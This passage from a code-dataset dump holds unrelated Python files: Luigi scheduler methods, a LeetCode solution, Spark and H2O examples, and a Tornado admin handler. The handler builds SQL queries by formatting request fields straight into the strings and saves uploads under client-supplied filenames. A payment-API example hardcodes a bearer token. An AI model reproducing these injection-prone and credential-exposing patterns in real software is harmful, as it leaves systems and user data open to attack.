self._state.get_task(task_id)\n if task is None or not task.family:\n logger.warn('Missing task for id [%s]', task_id)\n\n # try to infer family and params from task_id\n try:\n family, _, param_str = task_id.rstrip(')').partition('(')\n params = dict(param.split('=') for param in param_str.split(', '))\n except BaseException:\n family, params = '', {}\n serialized[task_id] = {\n 'deps': [],\n 'status': UNKNOWN,\n 'workers': [],\n 'start_time': UNKNOWN,\n 'params': params,\n 'name': family,\n 'priority': 0,\n }\n else:\n serialized[task_id] = self._serialize_task(task_id)\n for dep in task.deps:\n self._recurse_deps(dep, serialized)\n\n def dep_graph(self, task_id, **kwargs):\n self.prune()\n serialized = {}\n if self._state.has_task(task_id):\n self._recurse_deps(task_id, serialized)\n return serialized\n\n def task_list(self, status, upstream_status, limit=True, search=None, **kwargs):\n \"\"\"\n Query for a subset of tasks by status.\n \"\"\"\n self.prune()\n result = {}\n upstream_status_table = {} # used to memoize upstream status\n if search is None:\n filter_func = lambda _: True\n else:\n terms = search.split()\n filter_func = lambda t: all(term in t.id for term in terms)\n for task in filter(filter_func, self._state.get_active_tasks(status)):\n if (task.status != PENDING or not upstream_status or\n upstream_status == self._upstream_status(task.id, upstream_status_table)):\n serialized = self._serialize_task(task.id, False)\n result[task.id] = serialized\n if limit and len(result) > self._config.max_shown_tasks:\n return {'num_tasks': len(result)}\n return result\n\n def worker_list(self, include_running=True, **kwargs):\n self.prune()\n workers = [\n dict(\n name=worker.id,\n last_active=worker.last_active,\n started=getattr(worker, 'started', None),\n **worker.info\n ) for worker in self._state.get_active_workers()]\n workers.sort(key=lambda worker: worker['started'], reverse=True)\n if include_running:\n running = collections.defaultdict(dict)\n num_pending = collections.defaultdict(int)\n num_uniques = 
collections.defaultdict(int)\n for task in self._state.get_pending_tasks():\n if task.status == RUNNING and task.worker_running:\n running[task.worker_running][task.id] = self._serialize_task(task.id, False)\n elif task.status == PENDING:\n for worker in task.workers:\n num_pending[worker] += 1\n if len(task.workers) == 1:\n num_uniques[list(task.workers)[0]] += 1\n for worker in workers:\n tasks = running[worker['name']]\n worker['num_running'] = len(tasks)\n worker['num_pending'] = num_pending[worker['name']]\n worker['num_uniques'] = num_uniques[worker['name']]\n worker['running'] = tasks\n return workers\n\n def inverse_dep_graph(self, task_id, **kwargs):\n self.prune()\n serialized = {}\n if self._state.has_task(task_id):\n self._traverse_inverse_deps(task_id, serialized)\n return serialized\n\n def _traverse_inverse_deps(self, task_id, serialized):\n stack = [task_id]\n serialized[task_id] = self._serialize_task(task_id)\n while len(stack) > 0:\n curr_id = stack.pop()\n for task in self._state.get_active_tasks():\n if curr_id in task.deps:\n serialized[curr_id][\"deps\"].append(task.id)\n if task.id not in serialized:\n serialized[task.id] = self._serialize_task(task.id)\n serialized[task.id][\"deps\"] = []\n stack.append(task.id)\n\n def task_search(self, task_str, **kwargs):\n \"\"\"\n Query for a subset of tasks by task_id.\n\n :param task_str:\n :return:\n \"\"\"\n self.prune()\n result = collections.defaultdict(dict)\n for task in self._state.get_active_tasks():\n if task.id.find(task_str) != -1:\n serialized = self._serialize_task(task.id, False)\n result[task.status][task.id] = serialized\n return result\n\n def re_enable_task(self, task_id):\n serialized = {}\n task = self._state.get_task(task_id)\n if task and task.status == DISABLED and task.scheduler_disable_time:\n self._state.re_enable(task, self._config)\n serialized = self._serialize_task(task_id)\n return serialized\n\n def fetch_error(self, task_id, **kwargs):\n if self._state.has_task(task_id):\n return {\"taskId\": task_id, \"error\": self._state.get_task(task_id).expl}\n else:\n return {\"taskId\": task_id, \"error\": \"\"}\n\n def _update_task_history(self, task_id, status, host=None, worker_id=None):\n try:\n if status == DONE or status == FAILED:\n successful = (status == DONE)\n self._task_history.task_finished(task_id, successful, worker_id)\n elif status == PENDING:\n self._task_history.task_scheduled(task_id, worker_id)\n elif status == RUNNING:\n self._task_history.task_started(task_id, host, worker_id)\n except BaseException:\n logger.warning(\"Error saving Task history\", exc_info=1)\n\n @property\n def task_history(self):\n # Used by server.py to expose the calls\n return self._task_history\n","sub_path":"luigi/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":38414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"611153430","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if not root:\n return []\n ret, lvl = [], [root]\n while lvl:\n ret.append([node.val for node in lvl])\n lvl = [child for node in lvl for child in (node.left, node.right) if child]\n return ret\n","sub_path":"Binary Tree Level Order Traversal.py","file_name":"Binary Tree Level Order 
Traversal.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"641675489","text":"\n\nfrom xai.brain.wordbase.nouns._conviction import _CONVICTION\n\n#calss header\nclass _CONVICTIONS(_CONVICTION, ):\n\tdef __init__(self,): \n\t\t_CONVICTION.__init__(self)\n\t\tself.name = \"CONVICTIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"conviction\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_convictions.py","file_name":"_convictions.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"424049139","text":"import os\nimport pandas as pd\nimport logging\nimport json\n\nfrom handlers.BaseHandler import BaseHandler\nfrom utils.CJsonEncoder import CJsonEncoder\nfrom utils.commons import required_login\n\nclass PersonDataHandler(BaseHandler):\n @required_login\n def post(self):\n if not 'mark' in self.json_args.keys():\n try:\n upload_path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'ufiles')\n file_metas = self.request.files.get('file', None)\n if not file_metas:\n self.write(dict(msgcode=0))\n return\n for meta in file_metas:\n filename = meta['filename']\n file_path = os.path.join(upload_path, filename)\n with open(file_path, 'wb') as up:\n up.write(meta['body'])\n return self.write(dict(msgcode=1))\n except:\n return self.write(dict(msgcode=0))\n if self.json_args['mark'] == 0:\n sql = \"SELECT SQL_CALC_FOUND_ROWS a._user_id,a._name,a._id_card,a._jurisdiction,a._workshop,a._occupation,a._technical_grade,b._name _op_user_name,a._utime FROM _user a INNER JOIN _user b ON a._op_user_id = b._user_id AND a._user_id <> 111\"\n if int(self.json_args.get('_jurisdiction')) <= 2:\n sql += \" AND a._workshop='%s'\"%self.json_args.get('_workshop')\n sql += \" ORDER BY %s %s LIMIT %s,%s\"%(self.json_args['t'],self.json_args['o'],self.json_args['c'],self.json_args['l'])\n d = self.db.query(sql)\n return self.write(json.dumps(dict(persons=d, count=self.db.get('SELECT FOUND_ROWS() c')['c']), cls=CJsonEncoder))\n if self.json_args['mark'] == 1:\n path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'ufiles/%s' % self.json_args.get('filename'))\n try:\n df = pd.read_excel(path, sheet_name=0)\n df.replace('%', '%%', regex=True, inplace=True)\n df.dropna(how=\"all\", axis=0, inplace=True)\n df.fillna(value='', inplace=True)\n df.columns = ['user_id', 'name','idCard', 'workshop', 'occupation', 'technical_grade']\n df['opId'] = self.json_args.get('_user_id')\n sql = 'INSERT INTO _user (_user_id,_name,_id_card,_workshop,_occupation,_technical_grade,_op_user_id) VALUES %s' % str(\n df.values.tolist())[1:-1].replace('[', '(').replace(']', ')')\n self.db.execute(sql)\n self.write(dict(msgcode=1))\n except Exception as e:\n logging.error(e)\n self.write(dict(msgcode=0))\n return os.remove(path)\n if self.json_args['mark'] == 2:\n try:\n self.db.execute('DELETE FROM _user WHERE _user_id IN (%s)' % ','.join(self.json_args['id']))\n return self.write(dict(msgcode=1))\n except Exception as e:\n logging.error(e)\n return self.write(dict(msgcode=0))\n if self.json_args['mark'] == 3:\n try:\n self.db.execute(\"DELETE FROM _user WHERE _workshop = '%s'\"%self.json_args['g'])\n except Exception as e:\n logging.error(e)\n return self.write(dict(msgcode=0))\n return self.write(dict(msgcode=1))\n if self.json_args['mark'] == 4:\n return 
self.write(json.dumps(dict(persons=self.db.query('SELECT SQL_CALC_FOUND_ROWS a._user_id,a._name,a._id_card,a._jurisdiction,a._workshop,a._occupation,a._technical_grade,b._name _op_user_name,a._utime FROM _user a INNER JOIN _user b ON a._op_user_id = b._user_id%s AND a.%s LIKE \"%%%%%s%%%%\" ORDER BY %s %s LIMIT %s,%s'%(['', ' AND a._user_id NOT IN (111,%s)'%','.join([str(z) for z in self.json_args['x']])][len(self.json_args['x'])>0], self.json_args['k'], self.json_args['v'],self.json_args['t'],self.json_args['o'],self.json_args['c'],self.json_args['l'])), count=self.db.get('SELECT FOUND_ROWS() c')['c']), cls=CJsonEncoder))\n if self.json_args['mark'] == 5:\n self.write(dict(_workshop=self.db.query('SELECT DISTINCT _workshop FROM _user'), _occupation=self.db.query('SELECT DISTINCT _occupation FROM _user'),_technical_grade=self.db.query('SELECT DISTINCT _technical_grade FROM _user')))\n if self.json_args['mark'] == 6:\n a = self.json_args['k']\n b = ''\n if len(a['_workshop']) > 0:\n b += ' AND (a._workshop = \"'+'\" or a._workshop = \"'.join(a['_workshop'])+'\")'\n if len(a['_occupation']) > 0:\n b += ' AND (a._occupation = \"'+'\" or a._occupation = \"'.join(a['_occupation'])+'\")'\n if len(a['_technical_grade']) > 0:\n b += ' AND (a._technical_grade = \"'+'\" or a._technical_grade = \"'.join(a['_technical_grade'])+'\")'\n return self.write(json.dumps(dict(persons=self.db.query('SELECT SQL_CALC_FOUND_ROWS a._user_id,a._name,a._id_card,a._jurisdiction,a._workshop,a._occupation,a._technical_grade,b._name _op_user_name,a._utime FROM _user a INNER JOIN _user b ON a._op_user_id = b._user_id %s ORDER BY %s %s LIMIT %s,%s'%(['', ' AND a._user_id NOT IN (111,%s)'%','.join([str(z) for z in self.json_args['x']])][len(self.json_args['x'])>0]+['', b][len(b) > 0],self.json_args['t'],self.json_args['o'],self.json_args['c'],self.json_args['l'])), count=self.db.get('SELECT FOUND_ROWS() c')['c']), cls=CJsonEncoder))\n if self.json_args['mark'] == 7:\n a = self.json_args['v']\n try:\n self.db.execute('UPDATE _user SET _workshop=\"%s\",_occupation=\"%s\",_technical_grade=\"%s\",_jurisdiction=\"%s\", _id_card=\"%s\",_op_user_id=\"%s\" WHERE _user_id=\"%s\"'%(a['_workshop'], a['_occupation'], a['_technical_grade'], a['_jurisdiction'], a['_id_card'], self.json_args.get('_user_id'), a['_user_id']))\n except Exception as e:\n logging.error(e)\n return self.write(dict(msgcode=0))\n return self.write(dict(msgcode=1))\n","sub_path":"server/handlers/Admin/PersonHandler.py","file_name":"PersonHandler.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"55542125","text":"# EJEMPLO DE REGISTRO DE PAGO DE ORDENES AL API DE ARKADU\n# 2020-03-02\n\nimport json\nimport requests\n\ndef register_payment():\n \"\"\"\n Registra el pago de una orden.\n \"\"\"\n\n url = \"https://old.arkadu.com/api/shop/order/pay/\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer vUQzaKhCo9LpPfBAeAetUFQvv24ioC\"\n }\n body = {\n \"amount\": \"240000.00\",\n \"order\": \"2051963\",\n \"account\": \"0100-0001-08-0006051619\",\n \"reference\": \"ABDC0000123\",\n \"created\": \"2020-01-30 05:46\",\n \"user_id\": \"109679\"\n }\n\n result = requests.post(url, data=json.dumps(body), headers=headers)\n return result\n\npago = 
register_payment()\nprint(pago.json())","sub_path":"third-apps/arkadu_register_payment.py","file_name":"arkadu_register_payment.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"531566553","text":"from pyspark.sql import Row\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.types import *\r\nfrom pyspark.sql import SQLContext\r\n\r\ndef sql_context_api(spark):\r\n\r\n sc = spark.sparkContext\r\n sqlContext = SQLContext(sc)\r\n\r\n print(\"Start running SQL context API\")\r\n \r\n # createDataFrame\r\n l = [('Alice', 1)]\r\n sqlContext.createDataFrame(l).collect()\r\n res = sqlContext.createDataFrame(l, ['name', 'age']).collect()\r\n print(res)\r\n rdd = sc.parallelize(l)\r\n sqlContext.createDataFrame(rdd).collect()\r\n df = sqlContext.createDataFrame(rdd, ['name', 'age'])\r\n res = df.collect()\r\n print(res)\r\n print(\"createDataFrame API finished\")\r\n\r\n # table and cache \r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"]) \r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n sqlContext.cacheTable(\"table1\")\r\n sqlContext.uncacheTable(\"table1\")\r\n sqlContext.cacheTable(\"table1\")\r\n sqlContext.clearCache()\r\n # sqlContext.createExternalTable(\"table1\", schema = df2)\r\n sqlContext.dropTempTable(\"table1\")\r\n # res = df2.collect()\r\n # print(res)\r\n print(\"External, TempTable and cache API finished\") \r\n \r\n # getConf\r\n res = sqlContext.getConf(\"spark.sql.shuffle.partitions\")\r\n print(res)\r\n res = sqlContext.getConf(\"spark.sql.shuffle.partitions\", u\"10\")\r\n print(res)\r\n sqlContext.setConf(\"spark.sql.shuffle.partitions\", u\"50\")\r\n res = sqlContext.getConf(\"spark.sql.shuffle.partitions\", u\"10\")\r\n print(res)\r\n print(\"getConf API finished\")\r\n\r\n # newSession\r\n newspark = sqlContext.newSession()\r\n print(\"newSession API finished\")\r\n\r\n # range\r\n res = sqlContext.range(1, 7, 2).collect()\r\n print(res)\r\n res = sqlContext.range(3).collect()\r\n print(res)\r\n print(\"range API finished\")\r\n\r\n # read\r\n res = sqlContext.read\r\n text_sdf = sqlContext.readStream.text(\"/ppml/trusted-big-data-ml/work/examples/helloworld.py\")\r\n res = text_sdf.isStreaming\r\n print(res)\r\n print(\"read and readStream API finished\")\r\n\r\n # sql\r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"])\r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n df2 = sqlContext.sql(\"SELECT name AS f1, age as f2 from table1\")\r\n res = df2.collect()\r\n print(res)\r\n print(\"sql API finished\")\r\n\r\n # table\r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"])\r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n df2 = sqlContext.table(\"table1\")\r\n res = (sorted(df.collect()) == sorted(df2.collect()))\r\n print(res)\r\n print(\"table API finished\")\r\n\r\n # tableNames\r\n df = spark.createDataFrame([('Alice', 5, 80), ('Alice', 5, 80), ('Alice', 10, 80)], [\"name\", \"age\", \"height\"])\r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n res = (\"table1\" in sqlContext.tableNames())\r\n print(res)\r\n res = (\"table1\" in sqlContext.tableNames(\"default\"))\r\n print(res)\r\n print(\"tableNames API finished\")\r\n \r\n # tables \r\n sqlContext.registerDataFrameAsTable(df, \"table1\")\r\n df2 = 
sqlContext.tables()\r\n    res = df2.filter(\"tableName = 'table1'\").first()\r\n    print(res)\r\n    print(\"tables API finished\")\r\n\r\n    # register\r\n    # strlen = sqlContext.registerFunction(\"stringLengthString\", lambda x: len(x))\r\n    # res = spark.sql(\"SELECT stringLengthString('test')\").collect()\r\n    # print(res)\r\n    #spark.udf.registerJavaFunction(\"javaStringLength3\", \"org.apache.spark.sql.JavaStringLength\", \"integer\")\r\n    #res = spark.sql(\"SELECT javaStringLength3('test')\").collect()\r\n    #print(res)\r\n    #print(\"register API finished\")\r\n\r\n    print(\"Finish running SQL context API\")\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    spark = SparkSession \\\r\n        .builder \\\r\n        .appName(\"Python Spark SQL Context example\") \\\r\n        .config(\"spark.some.config.option\", \"some-value\") \\\r\n        .getOrCreate()\r\n\r\n    sql_context_api(spark)\r\n","sub_path":"ppml/trusted-big-data-ml/python/docker-gramine/base/examples/sql_context_example.py","file_name":"sql_context_example.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"379703874","text":"import requests\nimport json\nfrom django.conf import settings\n\n\nclass FlowerAPI(object):\n    def __init__(self):\n        self.api_root = 'http://localhost:5555/api'\n        self.task_api = '{}/task'.format(self.api_root)\n\n    def get_all_task(self):\n        url_all_tasks = '{}/tasks'.format(self.api_root)\n        req = requests.get(url_all_tasks)\n        resp = req.json()\n        return resp\n\n    def send_task_data(self, task_satelital, task_args):\n        url_async_apply = '{}/async-apply/{}'.format(self.task_api, task_satelital)\n        req = requests.post(url_async_apply, data=json.dumps(task_args))\n        resp = req.json()\n        return resp\n\n    def get_task_status(self, task_id):\n        url_task_status = '{}/result/{}'.format(self.task_api, task_id)\n        req = requests.get(url_task_status)\n        resp = req.json()\n        return resp\n
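\n\n# --- editor's usage sketch, added during editing and not part of the original\n# --- file; it assumes a Flower instance reachable on localhost:5555 and a\n# --- registered worker task named tasks.add (both are assumptions).\n# api = FlowerAPI()\n# all_tasks = api.get_all_task()\n# submitted = api.send_task_data('tasks.add', {'args': [1, 2]})\n# print(api.get_task_status(submitted['task-id']))\n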
","sub_path":"satelitales/utils/flower_apy.py","file_name":"flower_apy.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"28346791","text":"#!/usr/bin/env python\n# utf-8\n\n\"\"\"\nAssignment 15, Task 2\nJon Nations on 15 March 2016\nThis program tells you how many weekend days there are between today and the end of 2016\n\"\"\"\n\nimport datetime\n\n\ndef weekend(today, end):\n    weekend_days = 0\n    difference = (end - today).days\n    for i in range(difference):\n        current = today + datetime.timedelta(i)\n        day = datetime.date.weekday(current)\n        if day >= 5:\n            weekend_days += 1\n    print('\\nThere are', weekend_days,\n          'weekend days from today until 2016-12-31\\n')\n\n\ndef main():\n    today = datetime.date.today()\n    end = datetime.date(2016, 12, 31)\n    weekend(today, end)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"answers/jonnations/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"468019874","text":"import pandas as pd\n\ntrain = pd.read_csv('../train.csv')\ny_train = train.SalePrice\n\nprint('continuous type columns =>\\n', train.describe().columns.values)\nprint('discrete type columns =>\\n', train.describe(include=['O']).columns.values)\n\n# Fill missing values: set missing FireplaceQu entries to 'None'\ntrain['FireplaceQu'].fillna('None', inplace=True)\n\n# Fill missing values: set missing LotFrontage entries to 0\ntrain['LotFrontage'].fillna(0, inplace=True)\n\n# Fill missing values: impute missing MasVnrArea entries with the median MasVnrArea of the samples whose MasVnrType is BrkFace and Foundation is PConc\nmask = (train['MasVnrArea'].isnull())\ntrain.loc[mask, 'MasVnrArea'] = train[(train['MasVnrType'] == 'BrkFace') & (train['Foundation'] == 'PConc')][\n    'MasVnrArea'].median()\n\n# Fill missing values: set missing PoolQC entries to 'None'\ntrain['PoolQC'].fillna('None', inplace=True)\n\n# Fill missing values: set missing Fence entries to 'None'\ntrain['Fence'].fillna('None', inplace=True)\n\n# Inspect the number of missing values in each column\nnull_count_df = pd.DataFrame(train.isnull().sum())\nnull_count_df.set_axis(['null_count'], axis=1, inplace=True)\nnull_index = null_count_df[null_count_df['null_count'] == 0].index\nprint(null_count_df.drop(null_index))\n\n# Inspect the proportion of missing values in each column\nnull_mean_df = pd.DataFrame(train.isnull().mean())\nnull_mean_df.set_axis(['null_mean'], axis=1, inplace=True)\nnull_index = null_mean_df[null_mean_df['null_mean'] == 0.].index\nprint(null_mean_df.drop(null_index).sort_values(by='null_mean', ascending=False))\n\n","sub_path":"EDA/EDA2.py","file_name":"EDA2.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"30527070","text":"from dominate.tags import div, h2, img, p, link\nimport dominate\nimport html\n\nfrom . import news_parser, topdf\n\n\ndef createHtmlStructure(channel, limit, html_path, pdf_path):\n    '''\n    1. in loop create html structure\n    2. return html_structure \n    3. or file name of pdf for send_from_directory function\n    '''\n    html_document = dominate.document(title=\"HTML document\")\n\n    for index, item in enumerate(channel.entries):\n        if (index == limit):\n            break\n        with html_document:\n            with div():\n                h2(\"Title: \" + html.unescape(item.title))\n                p(\"Link: \" + item.link)\n                media_content = news_parser.checkMediaContent(item)\n                if (media_content):\n                    img(src=media_content)\n                description = news_parser.getDescription(item.description)\n                if (description):\n                    p(\"Description: \" + description)\n\n    if (html_path):\n        return str(html_document)\n    elif(pdf_path):\n        return topdf.convertHtmlToPdf(str(html_document), pdf_path)\n","sub_path":"final_task/rss_reader/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"430676904","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nfrom __future__ import print_function\n\nimport h2o\nimport sys\nsys.path.insert(1,\"../../../\") # allow us to run this standalone\nfrom h2o.grid.grid_search import H2OGridSearch\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom h2o.estimators.stackedensemble import H2OStackedEnsembleEstimator\nfrom tests import pyunit_utils\n\n\ndef airline_gbm_random_grid():\n    air_hex = h2o.import_file(path=pyunit_utils.locate(\"smalldata/airlines/allyears2k_headers.zip\"), destination_frame=\"air.hex\")\n    myX = [\"DayofMonth\",\"DayOfWeek\"]\n\n    hyper_parameters = {\n        'learn_rate':[0.1,0.2],\n        'max_depth':[2,3,4],\n        'ntrees':[5,10,15]\n    }\n\n    search_crit = {'strategy': \"RandomDiscrete\",\n                   'max_models': 5,\n                   'seed' : 1234,\n                   'stopping_rounds' : 3,\n                   'stopping_metric' : \"AUTO\",\n                   'stopping_tolerance': 1e-2\n                   }\n\n    air_grid = H2OGridSearch(H2OGradientBoostingEstimator, hyper_params=hyper_parameters, search_criteria=search_crit)\n    air_grid.train(x=myX, y=\"IsDepDelayed\", training_frame=air_hex, nfolds=5, fold_assignment='Modulo', keep_cross_validation_predictions=True, distribution=\"bernoulli\", seed=5678)\n\n    assert(len(air_grid.get_grid())==5)\n    
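# (editor's note, illustrative only and not part of the original test: with the\n    # RandomDiscrete strategy and max_models=5 the grid samples 5 of the\n    # 2 * 3 * 3 = 18 hyperparameter combinations, which is exactly what the\n    # assert above pins down)\n    # sampled_models = [h2o.get_model(m) for m in air_grid.model_ids]\n    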
print(air_grid.get_grid(\"logloss\"))\n\n\n\n stacker = H2OStackedEnsembleEstimator(selection_strategy=\"choose_all\", base_models=air_grid.model_ids)\n print(\"created H2OStackedEnsembleEstimator\")\n stacker.train(model_id=\"my_ensemble\", y=\"IsDepDelayed\", training_frame=air_hex)\n print(\"trained H2OStackedEnsembleEstimator\")\n predictions = stacker.predict(air_hex) # training data\n print(\"predictions for ensemble are in: \" + predictions.frame_id)\n\n # Check that the model can be retrieved\n assert stacker.model_id == \"my_ensemble\"\n modelcopy = h2o.get_model(stacker.model_id)\n assert modelcopy is not None\n assert modelcopy.model_id == \"my_ensemble\"\n\n # golden test for ensemble predictions:\n assert round(predictions[0, \"YES\"], 4) == 0.4327, \"Expected prediction for row: {0} to be: {1}; got: {2} instead.\".format(0, 0.4327, round(predictions[0, \"YES\"], 4))\n assert round(predictions[1, \"YES\"], 4) == 0.5214, \"Expected prediction for row: {0} to be: {1}; got: {2} instead.\".format(1, 0.5214, round(predictions[1, \"YES\"], 4))\n assert round(predictions[2, \"YES\"], 4) == 0.4666, \"Expected prediction for row: {0} to be: {1}; got: {2} instead.\".format(2, 0.4666, round(predictions[2, \"YES\"], 4))\n\n air_grid = H2OGridSearch(H2OGradientBoostingEstimator, hyper_params=hyper_parameters, search_criteria=search_crit)\n air_grid.train(x=myX, y=\"IsDepDelayed\", training_frame=air_hex, distribution=\"bernoulli\")\n assert(len(air_grid.get_grid())==5)\n print(air_grid.get_grid(\"logloss\"))\n\n # added this part to check h2o.get_grid is working properly\n fetch_grid = h2o.get_grid(str(air_grid.grid_id))\n assert len(air_grid.get_grid())==len(fetch_grid.get_grid())\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(airline_gbm_random_grid)\nelse:\n airline_gbm_random_grid()\n","sub_path":"h2o-py/tests/testdir_algos/gbm/pyunit_gbm_random_grid.py","file_name":"pyunit_gbm_random_grid.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"226279030","text":"import math\nimport os\nimport multiprocessing as mp\nfrom functools import partial\n\nimport waves as wv\nimport fractals as fr\n\ndef pre_path(shape=None):\n # check if folder exists, if not - create it\n dr = 'wavefiles/%s' % shape\n if os.path.isdir(dr) is False:\n os.makedirs(dr)\n \ndef path(shape=None, freq=None, contraction=1, growth=1, fertility=None): \n return 'wavefiles/%s/fr%s_c%s_g%s_f%s.wav' % (shape,freq,contraction,growth,fertility)\n\ndef _krotka(contractions, growth, fertility):\n for c in contractions:\n if fertility:\n for g in range(2, growth+1):\n for f in range(1,g):\n yield (c,g,f)\n else:\n yield (c,4,2)\n\ndef _gen(contraction, growth, fertility, \n freq = None, time = None, shape = None, curve = None, wave = None, damp = 1):\n wv.write_wavefile(path(shape, freq, contraction, growth, fertility),\n wv.compute_samples(wave(curve(freq, contraction, growth, fertility),damp),\n 96000*time))\n return\n\ndef run(contractions, growth, fertility, shape, curve, wave, freq, time, damp):\n pre_path(shape)\n pool = mp.Pool(6)\n pool.starmap(partial(_gen, freq = freq, time=time, shape=shape, curve=curve, wave=wave, damp=damp), _krotka(contractions, growth, fertility))\n pool.close()\n pool.join()\n\n## generator\n\nbs_fr = 65.4 # base frequensy of the sound in Hz\ntime = 4 # lenght of the sample in seconds\ncontractions = [1.1,1.3,1.5,1.7]\ngrowth = 4\n\n\n#\n#print('generating: train 
kahunas')\n#run(contractions, growth, False, 'train_kahuna', fr.train, fr.kahunas, bs_fr, time)\n#print('completed: train kahunas')\n#\n#print('generating: train combers')\n#run(contractions, growth, False, 'train_comber', fr.train, fr.combers, bs_fr, time)\n#print('completed: train combers')\n#\n#print('generating: train froths')\n#run(contractions, growth, False, 'train_froth', fr.train, fr.froths, bs_fr, time)\n#print('completed: train froths')\n#\n#print('generating: whip kahunas')\n#run(contractions, growth, True, 'whip_kahuna', fr.whip, fr.kahunas, bs_fr, time)\n#print('completed: whip kahunas')\n#\n#print('generating: whip combers')\n#run(contractions, growth, True, 'whip_comber', fr.whip, fr.combers, bs_fr, time)\n#print('completed: whip combers')\n#\n#print('generating: whip froths')\n#run(contractions, growth, True, 'whip_froth', fr.whip, fr.froths, bs_fr, time)\n#print('completed: whip froths')\n\nprint('generating: train froths')\nrun(contractions, growth, False, 'train_froth', fr.train, fr.froths, bs_fr, time, 6)\nprint('completed: train froths')","sub_path":"fractave/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"177268799","text":"import numpy as np\nfrom ..helper_funcs.helper import calculate_probability\n\ndef stochastic_universal_sampling(population):\n    new_mating_pool = []\n\n    calculate_probability(population)\n    r = np.random.uniform(0, 1 / len(population))\n    relative_probability = 0.0\n    current_member = 0\n\n    while(len(new_mating_pool) < len(population)):\n        relative_probability += population[current_member].get_probability()\n        # import pdb; pdb.set_trace()\n\n        while(r <= relative_probability):\n            new_mating_pool.append(population[current_member])\n            r += 1 / len(population)\n\n        current_member += 1\n\n    return new_mating_pool\n","sub_path":"files/selection/sus.py","file_name":"sus.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"17732658","text":"\"\"\"\nArtificial Intelligence applied to Business - \nCase Study 2\n\"\"\"\n# Testing phase\n\n# Import the libraries and the other python files\nimport os\nimport numpy as np\nimport random as rn\nfrom keras.models import load_model\nimport environment\n\n# Set the seeds for reproducibility\nos.environ [\"PYTHONHASHSEED\"] = \"0\"\nnp.random.seed(42)\nrn.seed(12345)\n\n# PARAMETER CONFIGURATION\nnumber_actions = 5 # change the direction and value of the temperature\ndirection_boundary = (number_actions - 1)/2 # central value separating heating from cooling\ntemperature_step = 1.5\n\n# BUILD THE ENVIRONMENT BY CREATING AN OBJECT OF THE ENVIRONMENT CLASS\nenv = environment.Environment(optimal_temperature = (18.0,24.0), initial_month = 0, initial_number_users = 20, initial_rate_data = 30)\n\n# LOAD A PRE-TRAINED MODEL\nmodel = load_model(\"model.h5\")\n\n# CHOOSE THE TRAINING MODE\ntrain = False\n\n# RUN ONE YEAR OF SIMULATION IN INFERENCE MODE \nenv.train = train\ncurrent_state, _, _ = env.observe()\nfor timestep in range(0, 12*30*24*60):\n    q_values = model.predict(current_state)\n    action = np.argmax(q_values[0])\n    \n    if (action < direction_boundary):\n        direction = -1\n    else:\n        direction = 1\n    
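# (editor's worked example, not in the original file: with number_actions = 5\n    # the boundary is (5 - 1) / 2 = 2.0, so action 0 yields direction -1 with\n    # energy abs(0 - 2.0) * 1.5 = 3.0, while action 4 yields direction +1 with\n    # the same 3.0 energy step)\n    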
